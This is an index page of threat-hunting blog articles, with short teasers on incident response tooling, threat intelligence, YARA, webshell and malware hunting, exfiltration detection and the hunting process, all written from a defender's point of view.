Threat Hunting Articles (32)

Make Your Incident Response and Threat Hunting Easier With Powershell Hunting Tools

Kansa is a framework for incident response using PowerShell. This framework can be used within an enterprise to collect data for incident response, breach hunts, and environment baseline creation. In this post, we’ll examine some PowerShell-based tools designed to collect and scan large amounts of data for incident response and threat hunting.

Understanding Threat Intelligence: Feed Evaluation

In this blog post we are going to learn how we can evaluate threat intelligence feeds more effectively with specific considerations.

A General Overview of Threat Intelligence Requirements

In this blog post, we are going to discover what are intelligence requirement characteristics, and the importance of establishing intelligence requirements.

What is an Indicator of Compromise (IOC)

This blog post will provide you with what is indicators of compromise (IOC), the lifecycle of an indicator, and Traffic Light Protocol (TLP).

Structured Threat Information Expression (STIX)

MITRE is leading a cooperative process to transmit threat intelligence data utilizing a standardized language called Structured Threat Information Expression (STIX).

Threat Modeling Basics: System Modeling

In this blog post, we are going to explain what is system modeling and why it is an essential part of threat modeling. Let’s start by defining what is threat modeling.

A General Overview of Threat Modeling Workflow

The threat modeling activity has a consistent plan that may be broken down into many basic elements. In this blog post, we are going to give a basic outline of a threat modeling process.

Threat Hunting: SIEM, ELK Stack, Splunk

Sysmon is a tool from Sysinternals that will be examined. System Monitor (Sysmon) is a Windows system service and device driver that remains resident across system reboots in order to monitor and log system activity to the Windows event log. It provides detailed information regarding the creation of processes, network connections, and changes to the time of file creation. By collecting the events it generates using Windows Event Collection or SIEM agents and then analyzing them, you can identify malicious or anomalous activity and understand how network intruders and malware operate. In this article we will discuss common tools used in threat hunting. SIEM, ELK stack and Splunk.

Threat Hunting: Windows Event Logs

Even though we were aware of event logs during the Windows XP era, we rarely referred to them. Users were intimidated by the amount of information they had to sift through to determine the source of a software or hardware issue. As the popularity of incident response grew, so did event logs. The incident response procedure demonstrated that these operating system artifacts were an invaluable source of information for determining what actions occurred on the machine. Therefore, event logs were viewed less as a troubleshooting tool and more for what they were intended to be. Windows Event Logs are a feature of all Windows editions. They allow us to audit and monitor software and hardware events occurring on the system. These events originate from a variety of sources, including applications and the operating system. All of these occurrences are recorded in a collection called the event log.

Introduction to Malware Endpoint hunting

Imagine at this stage that threat intelligence feeds are in place and network traffic/flow is being monitored, but nothing is producing warnings that warrant further investigation. That does not imply that the attacker has not gained access to the network. They likely breached the perimeter fortifications by circumventing the perimeter defenses. Perhaps an employee’s laptop was compromised at home or in a nearby coffee shop, and the enemy gained access to the heart of our organization. To be successful as a hunter, you must assume that the enemy has already gained access and that you must locate them. In this article we will concentrate on locating malware endpoints.

Malware hunting: Detection tools

Malware will not disappear anytime soon. To remain undetected as long as possible, malware authors employ a variety of tools and methods. We also require a variety of tools and techniques to locate them. Whether we’re searching for a Meterpreter session or a DLL injection, we should have an abundance of tools available. In this article, we will examine a variety of tools that aid in the search for malware on networks.

Hunting Webshells: Tools

In this article we are going to discuss tools that can be use to discover Webshells.

Hunting Webshells: Linux and Windows Commands

Log analysis is one of the techniques used to hunt for web shells (Apache, IIS, etc.). We will not devote a great deal of time to analyzing web shell logs.

Intro to Hunting Webshells

A web shell is a script that can be uploaded to a web server to facilitate remote machine administration. Internal or Internet-facing web servers can be infected, and the web shell is used to pivot to internal hosts.

Stay One Step Ahead of the Hackers by Hunting Suspicious Traffic

It is essential to understand what is normal in order to recognize what is not normal, such as a connection to port 443 with cleartext traffic. It is not possible to examine hundreds of thousands of packets per day at a workstation. Should malicious traffic traverse our hunting grounds, we should have access to a variety of enterprise products, including open-source software, that will assist us with this task and, ideally, capture a substantial amount of it. In this article, we will discuss how to identify normal network traffic when analyzing packets. The purpose of this article is to train your eye should you ever be required to inspect live or saved network traffic (PCAP).

Threat Hunting Concepts: Adversary Behavioral Identification for Predicting Attacks

Adversary behavioral identification is all about predicting attacks. It involves identifying the typical attack tactics or techniques used by an adversary to launch cyber attacks on a target network. It helps security experts in developing secure network infrastructure and adopting a variety of security techniques to prevent cyber attacks.

Analyzing malicious code without reverse engineering the assembly

When evaluating malicious code, there are various tools threat hunters can use to aid their investigation. One method to understand the behavior of suspicious files is to disassemble them. However, not everyone has the time or ability to learn assembly to comprehend a suspicious binary’s function. By using the Microsoft technical documentation site and knowing the malware’s capabilities, a threat hunter can make a more informed decision on the behavior of a suspicious file.

Fileless Malware: a New Type of Malware That Doesn't Rely on Executable Files

Fileless malware is a type of malware that does not rely on traditional executable files to infect a system. Instead, fileless malware uses existing system files and resources to infect a system and carry out its malicious activity. Fileless malware typically uses scripting languages like PowerShell or VBScript to execute malicious code. The malware code is injected directly into system memory, evading detection by traditional security solutions that focus on scanning files on disk.

Using YARA for Threat Hunting in Enterprise Environments

Yara is a powerful application that allows forensic and malware analyst to search within artifacts discovered during an investigation. Yara allows for fine-grain searches based on offsets within an executable, timestamp, specific strings, and dozens of other criteria. Previous articles have discussed Yara and demonstrated some of its (see Introduction to Yara Part I and Introduction to Yara Part II). Threat hunters also use Yara to search for indicators of compromise (IOC) to help support their hypothesis. They are able to search for the IOCs using threat intelligence reports, malware analyst reports, or knowledge they have about a specific type of malware.

Detecting exfiltration over network protocols

Data exfiltration (exfil) is when data is transferred out of the organization without authorization. This can be done through a number of methods, including using protocols in an unintended way to inject data into the traffic stream. By understanding how protocols work and what data is supposed to exist in each field, a threat hunter can better identify threat actors who are trying to or have stolen sensitive information from an organization.

Fuzzy Hashing, Import Hashing and Section Hashing

In a previous post, we looked at a variety of methods for tracking and recognizing malware samples, including hashes, fuzzy hashes, and even developing YARA rules. However, threat actors are constantly changing their signatures, making it difficult for us to recognize their approaches and tactics.

YARA: A powerful Malware Analysis Tool for Detecting IOC's - Part 2

In a previous article we discussed YARA rules, syntax and IOC’s. Let’s continue our acquaintance with YARA rules!

YARA: A powerful Malware Analysis Tool for Detecting IOC's - Part 1

There has been a lot of research done over the years to increase detection skills, and researchers have managed to come up with a lot of novel detection methods and methodologies. Each one has its own set of advantages and disadvantages. As a result, we can’t claim that we’ll choose one over the other when it comes to detection. Some are better suited to one task but not to another. In many businesses, a hybrid solution will be implemented in this manner.

Threat Hunting in Distributed Organizations: The Challenges are not Insurmountable

Threat hunting in a distributed organization can present some unique challenges. Those include gathering data from all applicable devices, having access to all devices relevant to the hunt being performed, and performing hunts relevant to the remote site - when applicable.

Proactive Cyber Security with Approaches to Threat Hunting

Proactive monitoring of harmful activities on a company’s networks is known as threat hunting. It’s a crucial step in an organization’s security, more companies are starting to invest in it. Threat hunting’s goal is to find threats before they cause damage, which necessitates the employment of specific methodologies. Threat hunting is a time-consuming procedure, but it’s critical for any firm that wants to keep ahead of the cybersecurity curve.

Train Threat Hunters and Develop your Threat Hunting Program with Threat Emulation

Organizations are under constant attack from sophisticated cyber adversaries. To defend against these threats, security teams must employ threat hunting techniques to identify and neutralize them. One such technique is threat emulation, which involves replicating an adversary’s behavior to understand their methods better, detect their behavior, and develop mitigating controls to block their attacks.

Email: Another Source for Data Exfiltration

When a data exfiltration occurs, the cyber threat hunt may begin by examining public web servers, databases, and file servers. Those are obvious first choices due to their accessibility from the internet and within the organization. Knowing the type of data exfiltrated could provide clues on where to begin the hunt. That is, hoping the organization knows where all their data is located within the organization. Insights on the type of data leaked and where the data is stored within the organization could help generate a hypothesis to begin the threat hunt. Though another service to check is email.

Improve Efficiency by Generating a Hypothesis Before Beginning a Threat Hunt

Threat hunting can be a daunting task. It can be difficult to know where to start, or what tools to use. One way to make the process easier is to generate a hypothesis before beginning your hunt. This will help you focus on specific areas, and make sure that you are looking for the right things.

The Right Team can keep Small Businesses Safe from Disaster

Threat hunting may seem like a process that only large organizations may need. Small businesses may feel they are not a target of cyberattacks so convincing them to invest in routine threat hunting processes may be difficult. According to the Small Business Administration, “88% of small business owners felt their business was vulnerable to a cyber-attack”. Hiscox insurance found that micro firms of less than ten employees “the median cost of all attacks this year [2021] was just over $8,000. But at the 95th percentile and beyond there were firms suffering losses of $308,000. Some encountered still worse outcomes. One German business services firm experienced breaches costing the equivalent of $474,000 per employee.” They also found some firms were attacked multiple times within a single year. Despite these statistics, small business owners continue to operate with the false sense of security that their business is too small to be a target.

Don't Overlook DNS in your Threat Hunting Arsenal

DNS is a service that may provide valuable information on whether an organization has been compromised. In order for it to be used to aid in threat hunting, it must be configured to log the queries and the IP of the host performing the query. Once the logging is enabled, some questions can be asked which can be answered by using a SIEM or scripting.

Understanding the Threat Hunting Process Step-by-Step

Threat hunting is the process of detecting and responding to cyber intrusions that network and endpoint security controls have missed. It is also a proactive approach to security that can help organizations identify and mitigate risks before it results in an incident. The stages of threat hunting vary based on the sources you read, though there are 5 general stages that can be gleaned from existing literature.

Becoming a Threat Hunter

A rare diamond is on display at a local museum for few weeks. An efficient security system is in place to ensure the diamond does not get stolen. The system comprises alarms, cameras, and trained staff. In spite of the security system, the staff would always be vigilant for theft attempts on the diamond. This includes studying the behaviour of visitors coming in to see the diamond.